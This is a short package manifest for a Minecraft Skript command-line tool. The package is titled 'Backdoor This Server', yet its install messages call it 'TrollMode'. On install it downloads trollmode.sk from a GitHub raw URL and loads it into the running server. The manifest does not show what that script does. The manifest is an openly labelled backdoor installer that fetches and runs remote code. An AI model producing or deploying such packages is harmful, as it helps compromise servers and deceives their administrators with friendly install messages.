@CMD PACKAGE STR
@NAME=Backdoor This Server
@MainInstallPath=plugins/skript
@CurrentVersion=1.0
@PackageUpdateURL=https://raw.githubusercontent.com/Domracz/SkriptCommandLine/main/cmdcode/packages/backdoor_this_server/backdoor_this_server.cmdpackage
@CMD PACKAGE END
@PACKAGE INSTALL STR
$dl https://raw.githubusercontent.com/Domracz/SkriptCommandLine/main/cmdcode/packages/trollmode/trollmode.sk -> trollmode.sk
$cmd "sk reload trollmode.sk"
$snd "&a[TrollMode] Thank you for installing trollmode on your server!"
@PACKAGE INSTALL END
@PACKAGE UNINSTALL STR
$snd "&a[TrollMode] Trollmode is being uninstalled. Thank you for using trollmode!"
$del trollmode.sk
$snd "&3Trollmode has been uninstalled."
@PACKAGE UNINSTALL END
